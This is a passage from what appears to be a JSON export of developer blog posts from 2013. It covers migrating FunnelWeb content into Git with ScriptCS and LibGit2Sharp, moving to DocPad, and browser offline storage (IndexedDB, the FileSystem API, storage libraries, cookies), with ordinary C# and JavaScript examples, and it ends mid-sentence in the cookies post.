which will resolve our Git repository. So my file now looks like this:\nusing LibGit2Sharp; static Repository InitOrOpen(string path) { var gitBasePath = Repository.Discover(path); if (gitBasePath == null) { Console.WriteLine("And we're creating a new git repo people!"); return Repository.Init(path); } Console.WriteLine("Found existing repo, keep on trucking"); return new Repository(gitBasePath); } using (var repo = InitOrOpen(@"C:\\_Code\\my-repo")) { Console.WriteLine("It's time to rock and rooooooooll"); } So my method InitOrOpen will take a path to a folder which is to be our Git repository. In the method it’ll use the Discover method of the Repository class which will locate the Git repository for the current folder or any of its parents. 
This means that I don’t have to pass the repository root, which works well for me using DocPad as I want to put my posts in src\\documents\\posts where my repository root is where the src folder exists.\nThe result of Discover will be the path which the Git repository resides in, as a string, which is null if there was no repository found. Based on that result we can choose to initialise a new Git repository, Repository.Init(path), or open the repository at the discovered path, new Repository(gitBasePath). This Repository object is what we’ll use to interact with Git from .NET.\nLastly the file will call the method in a using block which in turn just dumps out that we opened the repository.\nPackage.config Before we can run this ScriptCS file we’ll need get LibGit2Sharp installed, so how do we go about it… NuGet of course!\nFor this we’ll need a package.config file which defines our NuGet packages. Here’s where we’re at:\n<?xml version="1.0" encoding="utf-8"?> <packages> <package id="LibGit2Sharp" version="0.11.0.0" targetFramework="net45" /> </packages> Now we just need to run the ScriptCS file and our little app will do some logging out of messages!\nNote: When I was writing this I came across a problem, LibGit2Sharp expects the native Git assemblies to be in the same folder as LibGit2Sharp’s assembly. In a .NET app this is done by copying the NativeBinaries folder from the NuGet package into the bin folder as a post-build event in the csproj file. Since we don’t have a csproj in ScriptCS you need to manually copy that folder.\nPreping our data I’m not going to go into depth as to how to get your data out of your database to be pushing into Git, that’ll somewhat depend on the database and ORM you’re working with, you can find that from here in my source code.\nWhat is important to know is that ScriptCS doesn’t support dynamic in C#, so you’ll need to create a class which represents the object you’re pulling out of the database (the reason for this is at present Roslyn, which ScriptCS uses to do its execution doesn’t support it). I’ve done this by creating a Posts.csx file that is then loaded into ScriptSC.\nBut once we’ve got our data out of our database it’s time to push it into Git.\nGit it in ya We have our Git repository, we have our data, it’s time to do something about joining the two things together. Remember I said that I wanted each revision in my FunnelWeb database to be an individual commit in Git? Well that will be quite easy to do. The object model that I have brought back out of FunnelWeb respects that, each object is a snapshot of the post at a particular point in time. Next I’m going to have to do a few things:\nGet the comma-separated list of tags into an array Clean up my URI schema (in FunnelWeb it was very free-flowing, I want to normalize it a bit to the standard YYYY-MM-DD-name format) But I don’t want to break my existing SEO so I need to be able to track those old links and 301 them If a file doesn’t exist yet create a new file, otherwise update the existing one This is where it’s really cool, since we’ll just override the existing file and Git is pretty smart about diff-detection it’ll only track what changed between each version so we can then get nice clean diffs Now DocPad uses the fairly common YAML-style meta-data headers, but it also supports something they wrote specifically called cson which is a CoffeeScript version of JSON. 
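For reference, a cson front matter block looks roughly like this; the values are illustrative (borrowed from one of the Flight Mode posts) and the exact quoting may differ slightly from what my migrator writes out below:
--- cson
title: "Flight Mode - IndexedDB"
metaTitle: "Flight Mode - IndexedDB"
description: ""
revised: "2013-05-27"
date: "2013-05-27"
tags: [ "flight-mode", "offline-storage", "indexeddb" ]
migrated: "true"
urls: [ "/flight-mode/indexeddb" ]
---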
Since I’ve always found YAML a pain I’m going to use that for my post meta data headers.\nLet’s start writing our file to disk then:\nforeach (var item in items) { var tags = item.Tags.Split(',') .Select(x => x.Trim()) .Where(x => !string.IsNullOrEmpty(x)); var uriParts = item.Path.Split('/'); if (uriParts.Count() > 1) { tags = tags.Union(uriParts.Take(uriParts.Count() - 1)); } var postPath = Path.Combine(Settings.OutputPath, item.Published.ToString("yyyy-MM-dd") + "-" + uriParts.Last()) + ".html.md"; if (!File.Exists(postPath)) File.CreateText(postPath).Close(); using (var sw = new StreamWriter(postPath)) { sw.WriteLine("--- cson"); sw.WriteLine(Formatters.CreateMetaData("title", item.Title)); sw.WriteLine(Formatters.CreateMetaData("metaTitle", item.MetaTitle)); sw.WriteLine(Formatters.CreateMetaData("description", item.Desc)); sw.WriteLine(Formatters.CreateMetaData("revised", item.Date)); sw.WriteLine(Formatters.CreateMetaData("date", item.Published)); sw.WriteLine(Formatters.CreateMetaData("tags", tags)); sw.WriteLine(Formatters.CreateMetaData("migrated", "true")); sw.WriteLine(Formatters.CreateMetaData("urls", new[] {"/" + item.Path})); sw.WriteLine(Formatters.CreateMetaDataMultiLine("summary", item.Summary)); sw.WriteLine("---"); sw.Write(item.Contents); } //git stuff } Ok, that’ll do nicely, I’ve extracted my tags, cleaned up my URIs, so /flight-mode/indexeddb becomes /posts/2013-05-27-indexeddb.html for example, and I’ve built up a meta-data header which contains all the information that I found to be important (check out the DocPad documentation to get a better idea of what meta-data is available and for what purpose).\nNow it’s time to get it into Git, and more importantly, get it into Git with the right author date. Remember how I said there are two dates which a commit has, well I’m only going to concern myself with the author date, since that was when the revision was created, but the date it when into the repository isn’t particularly important, for all it matters it could have been in another repository before now (which abstractly speaking it was).\nTurns out that this is actually really easy to do! In fact LibGit2Sharp exposes the API to do just that as part of the commit API!\nvar commitMessage = string.IsNullOrEmpty(item.Reason) ? "I should have given a reason" : item.Reason; repo.Index.Stage("*"); repo.Commit(commitMessage, new Signature("Aaron Powell", "me@aaron-powell.com", (DateTime) item.Date)); First things first I’ve created a commit message based off of the revision reason in FunnelWeb, next I’ll stage all changes in the repository (this is just so I can be lazy and not worry about the file name :P) and lastly commit the stage providing an author signature which contains the author date as an argument.\nI was honestly shocked at just how easy that process turned out to be!\nSo now when we execute the code it’ll build up a nice Git repository for us.\nConclusionAnd that’s it, with only 100 lines of code (which contains a rather large SQL statement too) I was able to pull all the data out from FunnelWeb and then push each post revision as a separate Git commit.\nYou’ll find the full code for my migrator in my sites repository.\nOne final note though, I did have the following two problems:\nThe migrator didn’t like being run in the same repository as I was opening with LibGit2Sharp, I think the problem was related to ScriptCS locking the /bin folder which Git then didn’t have any access to and it’d crash. 
I didn’t look too deeply into this (C ain’t my forte these days) and it was easily solved by having the migrator source in a separate location (and it also meant I didn’t accidentally commit my real connection string) LibGit2Sharp didn’t seem to like it when I wasn’t in the master branch. I initially tried to use a separate branch to create all the commits that I’d then review and rebase into master, but whenever I did this it would create a new repository in the destination folder so I ended up with nested Git repositories. Again I didn’t delve into the underlying reason, I left it for Brendan to entertain himself with, instead I just did it in master and deleted my clone the few times I stuffed up :P ", "id": "2013-06-11-funnelweb-to-git" }, { "title": "New blog, less FunnelWeb", "url": "https://www.aaron-powell.com/posts/2013-06-10-new-blog-less-funnelweb/", "date": "Mon, 10 Jun 2013 00:00:00 +0000", "tags": [ "funnelweb", "docpad" ], "description": "It's time for a refresh, my blog has made a move, this time away from FunnelWeb.\n\nBut why, how and what for the future of FunnelWeb?", "content": "If you’re not viewing this via the website (ie - you’re reading it in a RSS reader) you’re probably not going to notice but I’ve just done a new design and as a side project I’ve also decided that it’s time to do a shift in the platform.\nYou see, I’ve been using FunnelWeb for a few years now, and it’s been going smoothly, sitting there chugging along doing all that I’ve really needed from it, but in recent months I’ve decided that there was something that didn’t really want anymore… a database.\nSince all the content for my blog was stored in a database I was at the mercy of my hosting provider, if something happened to them, they had hardware failures, a security breach, etc, I had no copy of my content that I could easily shunt somewhere else and get back online. Admittedly this has never happened but still, I felt that the lack of real ownership of my content, ultimately I didn’t have a copy of it… anywhere.\nOver the last 12 to 18 months there’s been a real shift in how to manage content, especially for simple sites such as what my blog is. The idea is to use a static site generator and flat files for the content input. This then results in a bunch of HTML files that can then be served out for your site, I mean really it’s not like the content of my blog changes all that frequently so the idea of it being constantly generated on the fly doesn’t really make sense. Something like FunnelWeb seems like an overkill for what I need, a series of HTML files.\nSo what are your options? Well there’s a few out there:\nJekyll is a popular choice which is written in Ruby Pretzel if you want to stick with a .NET base DocPad is an implementation in Node.js, and this is what I went with (for no reason other than I used DocPad when it was v1 and wanted to see what’d changed). 
All my content is now stored in a GitHub repo as a combination of Markdown and Eco templates (with a design from HTML5UP) and it gives me a lot of freedom over the content layout; more importantly I have copies of my content stored on my various devices, I have full history of the changes and it can be stored on any number of git hosts.\nSo as you read this you’re reading something that has been served from a static HTML file generated by DocPad, rather than some content pulled from a database that is parsed on request and a HTML result generated.\nThe future of FunnelWeb\nWith the move of my blog off FunnelWeb someone is bound to ask the question about the future of FunnelWeb. In fact the question recently came up on the mailing list, and ultimately it comes down to the fact that Jake and I consider it done. I plan to keep an eye on pull requests but at present there’s no plan to add new features going forward.\n", "id": "2013-06-10-new-blog-less-funnelweb" }, { "title": "Flight Mode - Libraries", "url": "https://www.aaron-powell.com/posts/2013-05-30-libraries/", "date": "Thu, 30 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "indexeddb", "localStorage", "sessionStorage", "offline-storage" ], "description": "", "content": "Throughout the last few posts we’ve looked at the different ways in which we can store data offline in browsers and then created a basic little API that will help us with doing that. The FlightMode API that we’ve been working with was, though, quite a simplistic approach to the problem that we were presented with; ultimately the API isn’t meant for production use.\nSo when looking at the different storage options what do we have if we did want to go to production? In this article we’re going to look at some of the different API wrappers for the different storage technologies that we’ve looked at.\nLawnchair\nSite: http://brian.io/lawnchair/\nLawnchair is one of the most fully featured storage options that we’ve got available to us, and also what I based the concept of FlightMode on. Lawnchair offers a variety of ways in which you can store data through its adapter system; you can plug in whichever storage option you want, and there are a few options. The one that doesn’t exist is cookies but as I pointed out in that post they aren’t exactly the best option when it comes to storing data.\nAnother interesting aspect of Lawnchair is that it is asynchronous by default, so using adapters like localStorage (which they refer to as DOM storage) requires a callback argument to be passed to it. This is nice as it means you have a more consistent API usage when it comes to using actually asynchronous APIs like IndexedDB and FileSystem.\nThe main drawback I find is that because Lawnchair provides such a vast array of storage options behind a consistent programming API you ultimately lose some of the power of the underlying provider. This is especially a problem with IndexedDB, where you lose a lot of the power of indexes and querying against them.
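To give a feel for that trade-off, here’s roughly what working with Lawnchair looks like. This is a hedged sketch from memory of its documented callback style rather than a verified example, so the exact adapter name, option keys and callback arguments may differ slightly:
// A rough sketch of Lawnchair's callback-based API (the adapter name and
// callback signatures are assumptions - check the Lawnchair docs).
Lawnchair({ name: 'people', adapter: 'dom' }, function () {
    // inside the constructor callback 'this' is the store itself
    this.save({ key: 'aaron', firstName: 'Aaron', lastName: 'Powell' }, function (person) {
        console.log('saved', person);
    });

    // there's no index support at this level - querying means pulling
    // everything back and filtering it yourself
    this.all(function (people) {
        var aarons = people.filter(function (p) {
            return p.firstName === 'Aaron';
        });
        console.log('found', aarons.length, 'records');
    });
});
Every adapter exposes that same minimal surface, which is exactly where the lowest-common-denominator trade-off comes from.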
But if your goal is to have offline storage across as large a browser set as possible then it’s a price you’ll have to pay.\nLawnchair really is a good choice if you want to be able to do storage across a lot of platforms and use feature detection to work out exactly what adapter can be used.\nAmplifyJS.store\nSite: http://amplifyjs.com/api/store/\nAmplifyJS.store, like Lawnchair, aims to be an API simplification of the various browser storage models but rather than trying to be a one-size-fits-all option it is more focused on just key/value storage, in particular localStorage and sessionStorage.\nThe programmatic model of AmplifyJS.store is also much simpler: rather than trying to provide helper methods to do things like filtering objects it provides a minimal surface area and leaves that up to you, so it gives you a method to get all objects and then you can perform your own map, filter, etc. operations. This is good as it doesn’t try and pretend that the underlying store is something that it’s not.\nThe API is also synchronous, unlike Lawnchair, which has the upside that you can avoid the complications that arise from asynchronous programming and callback hell.\nAmplifyJS.store is a nice API if you want something that is simple and just does the job of handling key/value storage without trying to go over the top.\nPouchDB\nSite: http://pouchdb.com/\nPouchDB is one of the most powerful libraries when it comes to working with complex data stores in the browser (it also supports node.js) and is very much a specialist at storing data with IndexedDB. It’s an implementation of the CouchDB programming interface built on top of IndexedDB (there are providers for WebSQL, levelDB and an HTTP interface) that gives you a lot of power when it comes to interacting with the underlying data stores.\nAnother killer feature of PouchDB is that it has the ability to sync directly to a CouchDB instance via the HTTP interface. This means that if you’re using CouchDB as your backend then you’ve got an option to easily keep your data in sync between your client and server. This is really handy, particularly in the scenario I’ve been trying to paint over this series of being able to maintain user state even when they are offline.\nThe obvious drawback of this is that it’s really geared around CouchDB developers so the API is designed for them. That said it doesn’t mean that it’s a bad API or something that can’t be used without CouchDB, it definitely can be and it is very good at turning the IndexedDB programming API into something that is even closer to being a full NoSQL database by exposing map/reduce directly from the query API.\nIf you’re looking for a very full-featured IndexedDB wrapper then PouchDB should be given a very serious look.\ndb.js\nSite: https://github.com/aaronpowell/db.js\ndb.js is a library that I wrote with the single goal of improving the programmatic API for IndexedDB. As I mentioned in my article on IndexedDB I find that the API is very verbose and quite foreign to front-end development so I wanted to set out and improve that.\nThe other main design goal was to make the event handling better, more specifically to utilize Promises, so that you could assign multiple handlers to events that get raised and interact with them that way.
It was also so it could be interoperable with other asynchronous operations and other libraries that implement Promise APIs.\nFinally I wanted a really simple way in which you could query the data stored, again in a manner that is familiar to JavaScript developers. For this I went with a chaining API (made popular by jQuery) so that you could do all your operations in a single chain, but I also expose the important query features built in, such as querying on a specific index; the chaining also allows you to query in a more expanded manner, say first on an index and then on a custom function.\nUltimately this is a very thin wrapper over IndexedDB and it’s only designed for IndexedDB usage which makes it an ideal candidate if that’s your only target platform and you want something very lightweight.\nConclusion\nThis has been a brief overview of a number of different JavaScript libraries for working with different offline storage models, libraries from the generic abstraction all the way down to specific implementations.\nBy no means is this an extensive list of libraries available, I’m sure that there are dozens more out there that would be worth looking into, but ultimately this was meant to be an introduction to a few which I see a great deal of promise in.\n", "id": "2013-05-30-libraries" }, { "title": "Flight Mode - FileSystem API", "url": "https://www.aaron-powell.com/posts/2013-05-28-file-system/", "date": "Tue, 28 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "file-system" ], "description": "", "content": "The last piece of the puzzle when looking at offline storage options is a bit of a shift from what we’ve been looking at so far. Generally speaking we’ve been looking at how to store plain data, either through key/value stores or as objects. This time we’re going to look at the other kind of data you might want to store, files.\nThere are two ways we might want to store files, as binary data in IndexedDB or using the FileSystem API. Since we looked at IndexedDB last time (although we didn’t cover how to store Blobs, the principle is the same as what we looked at), this time we’ll look at the FileSystem API.\nSide note: At the time of writing the only browser supporting this API is Chrome so this is more of a “watch this space” style post than a “go use it now” one.\nThe idea of the FileSystem API is to give browsers the ability to persist files either temporarily or permanently. Temporary persistence means that the browser is free to decide when it wants to get rid of the file system that has been created, whereas permanent persistence means that it will not do an automatic cleanup of the files and folders.\nEssentially what you end up with from the API is an ability to create files and folders in a sandboxed scenario. You don’t have access to the real file system of the device, so no access to My Documents or Program Files, just an isolated little location to work in.
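To make that a little more concrete, here’s a rough sketch of asking for a sandboxed file system and writing a file into it, based on the Chrome-prefixed API as it stood at the time (the file name, quota size and error handling are illustrative only):
// Request 5MB of temporary, sandboxed storage (Chrome prefixes the API).
var requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;

requestFileSystem(window.TEMPORARY, 5 * 1024 * 1024, function (fs) {
    // fs.root is the root DirectoryEntry of our sandbox, not the real disk
    fs.root.getFile('scores.txt', { create: true }, function (fileEntry) {
        fileEntry.createWriter(function (writer) {
            writer.onwriteend = function () {
                console.log('written to', fileEntry.fullPath);
            };
            writer.write(new Blob(['high score: 9001'], { type: 'text/plain' }));
        });
    });
}, function (err) {
    console.error('file system error', err);
});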
So this can be really quite useful if you’re say building a game, chances are you have a few assets that are required (audio, video, graphics) and the ability to retrieve them without web requests can be advantageous.\nBenefits of the FileSystem for storage As mentioned this API is serving a different purpose to the other storage APIs we’ve looked at, with the exception of IndexedDB (in a limited scenario at least) so some of the benefits are unfair comparisions.\nLike IndexedDB the FileSystem API is an asynchronous API which has the obvious benefits when it comes to working with the kind of data it is designed for, storing large files you do ideally want that to be done asynchronously so that you aren’t blocking the users interactions.\nAnother benefit is that the file system you create is completely sandboxed, meaning you don’t have to worry about what others may try and do to it. The only thing you need to take into account is the persistence level of the file system, as mentioned above temporary file systems are at the browsers mercy for clean-up, but it’s an opt-in to be using temporary persistence.\nAs with other storage options there are size limitations on the file system that is created, the difference is (at least at the time of writing) you can specify the size of the file system you want. Chrome will then determine whether the user needs to approve this storage level and if so request permission like other device-sensitive APIs (getUserMedia for example).\nThe API itself is quite nice to work with, especially if you’re coming from a server background, creating new files is handled through writer streams while you have separate streams for reading files. You can store files of different types with different encodings and have a lot of flexibility to create a directory structure that suites your needs.\nDrawbacks of the FileSystem for storage The main drawback is browser support, as mentioned Chrome is the only browser at present that implements the FileSystem API and it seems that one of their main drivers is use within their extension system. While there’s nothing wrong with that it does mean that it’s not really possible to utilize this API is a cross-browser scenario. There is a shim available that uses IndexedDB but it does require your IndexedDB implementation to support Blob storage which can be a problem in Internet Explorer 10.\nAnother drawback is the API interactions, while it’s not quite as verbose as working with IndexedDB the API itself partially relies on the DOM Level 3 events and partially relies on callbacks being provided. This means that in some instances you’ll be attaching event handlers, like when you’re using a FileReader:\nvar reader = new FileReader(); reader.onloadend = function (e) { ... }; reader.readAsText(file); And other times you’ll have to pass a callback:\nwindow.requestFileSystem(window.TEMPORARY, 1024*1024, onInit, onError); API inconsistence can be annoying for developers to work with and something that you need to be mindful of.\nThe final drawback I see is that there’s no file system querying available, meaning you have to know where your files are stored, which can be a bit tricky when you’re working with directories in your file system. 
Admittedly this is a minor problem, you probably shouldn’t be storing files whose location you don’t know, but it can still be something that you’d want.\nImplementing FileSystem storage Unlike the other storage options I’ve decided not to cover how to implement this API because:\nIt really wouldn’t fit with the FlightMode API we’ve got so far, that’s designed for non-hierarchical data This is more of a watch this space post than a go use it one since the browser support is quite lacking There is a great article on HTML5 Rocks that’ll do it more justice than I can give it\nConclusion\nThe idea of being able to store files, complete files, in a structured manner on the client is a really exciting one. Admittedly there’s a much narrower use-case for such an API compared to the other storage options we’ve discussed, but the problems that it solves are very real and will likely become more relevant as more fully fledged web applications appear.\nThe API itself is not bad to work against, even if it is a bit inconsistent, and keep in mind that the specification is still in draft status so it may change in the future.\n", "id": "2013-05-28-file-system" }, { "title": "Flight Mode - IndexedDB", "url": "https://www.aaron-powell.com/posts/2013-05-27-indexeddb/", "date": "Mon, 27 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "indexeddb" ], "description": "", "content": "The next stop in our offline storage adventure is to look at the big daddy of offline storage, IndexedDB. Now I’ve blogged about IndexedDB in the past but today I want to talk about it at a slightly higher level and introduce the idea of IndexedDB beyond just how to use the API.\nIndexedDB is the latest approach to doing offline storage in web applications, it is designed as a replacement for the WebSQL spec which is now discontinued. One of the main reasons that WebSQL was discontinued was because it was tied to a specific version of SQLite which introduced some problems. If you needed to change something in the way the API worked you needed to change the SQLite implementation first. So IndexedDB was proposed as a replacement to WebSQL and the design was not tied to any particular underlying technology (I’ve previously blogged about how different browsers store their data).\nIndexedDB is quite different to WebSQL; instead of being a dialect of the SQL language, IndexedDB is much more closely related to a NoSQL, or document, database (it’s not a true document database but I’m not here to argue semantics). Data is stored as the objects they are (once they’ve been cloned, so you don’t maintain prototype chains), not as strings like we’ve seen in the other options.\nBenefits of IndexedDB for storage There are several important benefits of IndexedDB over the other storage options we’ve looked at, the first is something that’s a very big break from the other options, asynchronicity.\nWhere the other APIs all perform their operations in a synchronous manner IndexedDB doesn’t. This means that we get the benefits of having a non-blocking operation, so if you’re writing a large amount of data, you’re on a low-powered device, you’re experiencing high disk I/O, etc., you don’t want the user to think your web application has crashed while you’re storing their data. Asynchronous operations aren’t exactly a new concept on the web so it’s nice to see that they’ve come to the storage level.\nThe next benefit is transactions. Anyone who’s done database work will know the benefit of this within an application.
Once you start doing lots of read/write operations, accepting user input and so on, the chance of getting data that you can’t handle is high. Transactions give you the ability to group operations and then, if they fail, roll them all back without getting your data store into a corrupt state. Transactions can also be read-only or read-write, meaning that you can more selectively lock your data depending on the kind of operations being undertaken and limit the chance of corruption.\nAnd then there’s the way it handles data; where the previous options were storing data as strings, meaning we have to serialize/deserialize, IndexedDB stores the data as the objects that were provided (admittedly there’s a few steps it goes through first). This means that we can do a few smarter things on top of what we could do with strings, firstly we can create indexes. Again if you’re familiar with databases you’ll be familiar with indexes, but basically these allow us a nifty way to produce optimal query points. Say you’ve got people objects and you always query by firstName; you can then create an index so it’ll optimize that kind of query. Which then leads on to the next part about handling data, querying. Since we’re storing full objects, when we want to find data (such as with our getAll method) we have the full objects to work against rather than just doing it against the full in-memory collection.\nDrawbacks of IndexedDB for storage The biggest drawback of IndexedDB is probably going to be a pretty obvious one for an API that is as new as it is and that’s browser support. At the time of writing the following browsers support IndexedDB unprefixed:\nInternet Explorer 10+ Chrome 25+ Firefox 19+ So you can see that there’s a major limitation when we’re looking to go offline, the mobile space. Because of the browser support Windows Phone 8 is the only phone that supports IndexedDB natively. Luckily there’s hope, there’s a shim for IndexedDB that uses WebSQL as the underlying store. This means that iOS Safari (and desktop Safari) as well as Android can have the API exposed to them.\nThe other big drawback for me is the API, it’s excessively verbose and generally feels very foreign to front-end development. Things like transaction, index and cursor are not really common concepts when you talk to front-end developers. And then there’s API calls like cursor.continue() when you’re iterating through a query; while it might look innocuous the problem is that continue is a reserved word in JavaScript so pretty much every editor I’ve used (and most linters) will raise a squiggly/warning which the OCD-coder in me flinches at, resulting in a lot of code people write like cursor['continue']();.
And on the verbosity, say you want to query a store on a non-unique index (our firstName property for example), to do that you must:\nHave an open connection to your database, indexedDB.open('my-db'), and wait for it to succeed Open a transaction, db.transaction('my-store') Open the store from the transaction, transaction.objectStore('my-store') Open an index from the store, store.index('firstName'), and create a key range for the value you’re after, IDBKeyRange.only('Aaron') Open a cursor from the index, index.openCursor(range), and wait for it to succeed In the success method of the query check to see if there was a cursor, if there was get its value and either work with it or push it to an array in the closure then call cursor.continue(), or if there was no cursor ignore it (no cursor is the end of the query) In the success method of the transaction process the captured values, assuming you wanted to work with them all together That’s a lot of steps to get data by a property…\nThis then brings us to how you listen to the asynchronous actions. Generally you’ll see code like this:\nrequest.onsuccess = function (e) { ... }; To me that feels very reminiscent of the IE6 era where events were registered by on<something>. Admittedly you can use addEventListener since IndexedDB uses the DOM3 event specification, but it seems to be the less-used approach in the documentation.\nImplementing IndexedDB storage When we have a look at implementing IndexedDB storage on top of our FlightMode API that we’ve been using there’s an immediate problem, we’ve only been working with synchronous APIs up until now but as I mentioned above one of IndexedDB’s benefits is that it is asynchronous. Because of this we’ll have to approach the API usage a bit differently, first up the FlightMode constructor now has two new arguments, a migrate and a ready callback argument. The ready argument is the most important one, it will be triggered when our IndexedDB connection is open and we can start using the API. The migrate callback on the other hand is used to allow you to manipulate the objectStore (such as create indexes) if required. Additionally, to make it nicer to work with the asynchronous nature of the API I’ve leveraged the Promise/A+ specification for handling the events via the Q library.\nSide note: If you’re not familiar with Promises have a read through my series on exploring them with jQuery.
It’s not exactly the same as Promise/A+, you can read about the differences here.\nWarning: This is a really basic IndexedDB implementation, it glances over much of the really powerful features, such as complex index queries, for information on that check out my other IndexedDB posts.\nOur internal Store object has got a much more complex constructor this time since there’s a few more things we need to do, we must:\nOpen our connection to the database Create the object store if required Notify the consumer that the API is ready So it will look more like this:\nvar Store = function (name, onMigrate, onSuccess) { var that = this; var request = indexedDB.open('flight-mode'); this.storeName = name; request.onsuccess = function (e) { that.db = e.target.result; onSuccess(); }; request.onupgradeneeded = function (e) { var db = e.target.result; var store = db.createObjectStore(name, { keyPath: '__id__', autoIncrement: true }); if (onMigrate) { onMigrate(store); } }; }; One nice thing about IndexedDB is that it can automatically create an id for the object, which I’ve turned on (it’ll be stored in the __id__ property) and set to autoIncrement: true so that it will create a new one for each record.\nTo use this we would do something like so:\nvar ready = false; var store = new FlightMode('my-store', 'indexedDB', function () { ready = true; }); It is a bit tedious that we’d have to check for the ready flag before any query or risk the API not being ready to use but that is something you can program around with Promise/A+ pretty easily.\nAs I mentioned in my drawbacks list the API is very verbose, but we can still make it reasonably simple to use as a consumer and hide away that verbosity. Let’s look at the add method. Again since this is asynchronous we’ll need to take that into consideration. This is where I’m leveraging Q, I’m creating a deferred object that you then will interact with.\nStore.prototype.add = function(obj) { var transaction = this.db.transaction(this.storeName, 'readwrite'); var store = transaction.objectStore(this.storeName); var d = Q.defer(); store.add(obj).onsuccess = function (e) { d.resolve(e.target.result); }; return d.promise; }; First things first we need to create a new transaction, this is a writable transaction since we’ll manipulate data. From said transaction we can then go out and get our object store that we’re writing to. Lastly we setup our deferred object from Q which we’ll then return so we can use the Promise. When you add a record into the object store it’ll fire off the success event when done and an error event if it was to fail. I’m omitting error handling here to save code, but you’d capture the IDBRequest from the add call which you attach other handlers to.\nWhen the request is successful the events target will be the id that was generated by IndexedDB for us. If you’re not using auto-incrementing IDs the value will be what ever you defined as your keyPath anyway. 
I’m then resolving that out via our Promise resulting in an API usage like so:\nstore.add({ firstName: 'Aaron', lastName: 'Powell' }).then(function (id) { console.log('Object stored with id', id); }); Getting a record out by its id is also reasonably trivial once you understand the basics of IndexedDB, here’s the code:\nStore.prototype.get = function(id) { var transaction = this.db.transaction(this.storeName); var store = transaction.objectStore(this.storeName); var d = Q.defer(); store.get(id).onsuccess = function (e) { var obj = e.target.result; if (obj) { d.resolve(obj); } else { d.reject('No item matching id "' + id + '" was found'); } }; return d.promise; }; We have a few things in common with the add method, but this time we don’t specify what type of transaction we want. If you don’t specify a type it will be read-only as transactions are read-only by default.\nNote: If you want to be explicit about it pass in readonly as the second argument.\nLike add the store.get method returns an IDBRequest which we listen for events on. When the object doesn’t exist in our store it won’t raise an error as this isn’t really an error state, instead we’ll have the request succeed and the result on the event’s target will be null. This means that we have to do the check inside the success handler and in this case I’m rejecting the Promise with an error message to consumers.\nWe end up with a usage like so:\nstore.get(1).then(function (obj) { console.log('Object found', obj); }, function (msg) { console.log(msg); }); The final thing that really gets the power out of IndexedDB is that we can produce indexed queries, so finding items is more optimal. To do this we need to leverage the migrate callback so we can create ourselves an index for the objectStore. It would look something like this:\nvar store = new FlightMode('my-store', 'indexedDB', function () { ready = true; }, function (store) { store.createIndex('firstName', 'firstName'); }); The migrate callback receives an instance of our objectStore which we can then create indexes from using the createIndex method. This takes a name for the index and a keyPath for the property of the object we want to index. Optionally you can pass in some options such as whether it should be a unique index.\nWith the index created we can then use it within the getBy method, like so:\nStore.prototype.getBy = function(property, value) { var transaction = this.db.transaction(this.storeName); var store = transaction.objectStore(this.storeName); var d = Q.defer(); var items = []; var index = store.index(property); index.openCursor(IDBKeyRange.only(value)).onsuccess = function (e) { var cursor = e.target.result; if (cursor) { items.push(cursor.value); cursor['continue'](); } }; transaction.oncomplete = function () { d.resolve(items); }; return d.promise; }; To query the index we need to use a cursor, restricted to the value we’re after with a key range (and as I mentioned above the continue method is annoying…).
Next we listen to the success event of the cursor request, extracting the items out as we navigate through the cursor.\nOnce the cursor is exhausted the transaction will be completed and then we can resolve all the items which we wanted from it.\nYou can find the rest of the implementation in the github repository.\nConclusion\nIndexedDB is still a rather new technology so it’s something that needs to be used with a certain amount of caution, if you can’t target only the latest browsers then it might not be possible to use it in your application.\nThat said it is a really powerful API, the fact that it is asynchronous is alone a reason that it should be chosen over pretty much any other storage option when storing large amounts of data.\nWhile there are drawbacks with the API design, particularly the fact that it can be very verbose and very foreign to web developers, it isn’t that difficult to hide away the bulk of the API with your own façade, using libraries like Q to make it easier to interact with the API and only exposing the features that you really need in your application.\nDefinitely keep an eye on IndexedDB in the coming years, especially when doing Windows 8 applications, as it’ll be more available and more important for building offline applications.\n", "id": "2013-05-27-indexeddb" }, { "title": "Flight Mode - Cookies", "url": "https://www.aaron-powell.com/posts/2013-05-23-cookies/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "offline-storage", "flight-mode", "cookies" ], "description": "", "content": "In the beginning there was a simple way to store data offline in an application, or more accurately, across sessions, and that is the HTTP Cookie.\nCookies are used for everything, they can track you for spammers, expose your secure connections for hackers and they can be used for legitimate purposes which I’m going to look at here.\nThe Cookie is the oldest form of offline storage available on the web, first emerging in the mid ’90s with Netscape. All browsers support them so it’s your most easily accessible cross-browser storage solution.\nBenefits of Cookies for storage There are a few aspects to cookies that make them appealing for storing offline data so let’s have a look at a few of them.\nSince cookies are part of the HTTP header they are included in every request that you make, which can be useful if you want to sync the data that’s been created while the application is offline back to the server when the user reconnects. There’s no special AJAX request you’d need to create to handle the sync, any request would do, it’s just up to your server to handle said cookies. This has an obvious downside though, the more you store in cookies the bigger your request/response payload is going to be, so keep that in mind if you want to use cookies for storing data, particularly when limited data connections are applicable, such as on mobile devices.\nExpiry is another benefit that cookies bring to the table. If you’re storing data offline you may be wanting to get rid of it after a certain time period to prevent it from becoming stale. Cookies have an expiry date built into them when they are created, meaning that when you first set up your stored data you can determine just how long you want it to hang around.
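As a quick illustration, setting an expiry is just a matter of formatting a date into the cookie string; here’s a minimal sketch using the raw document.cookie API (the cookie name and the 30-day window are only examples):
// Store a small preference in a cookie that expires in 30 days.
var expires = new Date();
expires.setDate(expires.getDate() + 30);

document.cookie = 'theme=dark; expires=' + expires.toUTCString() + '; path=/';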
Admittedly it won’t “magically” disappear if the user is offline at the time, but it will expire through new requests that are done.\nDrawbacks of Cookies for storage Unsurprisingly there are some drawbacks to using cookies, some pretty major ones to be exact too, the first main drawback is that cookies are simply not designed to be used this way. While it might sound great to be able to have your offline data sent to the server without you needing to do anything it really starts to come apart when you want to store any real amount of data. Cookies can only handle a small amount of data (around 4KB each) which means that they’re best used for little flags, maybe tracking a simple preference like which theme to use.\nAnother major drawback is that cookies have the laxest cross-origin restrictions of all the offline storage options we’ll be looking at. As I mentioned earlier cookies were a common tool in the spammer’s toolbox and that was because you could very easily get data out of them without owning the domain; sure you still had to get your code into the page but if you’re serving ads then you’re part of the way there already.\nFinally the API for cookies really does leave a lot to be desired. Don’t get me wrong there’s a myriad of wrapper APIs for the document.cookie object that’ll help you add/remove cookies but it doesn’t solve the fundamental problem, cookies are only strings, meaning if you want to store 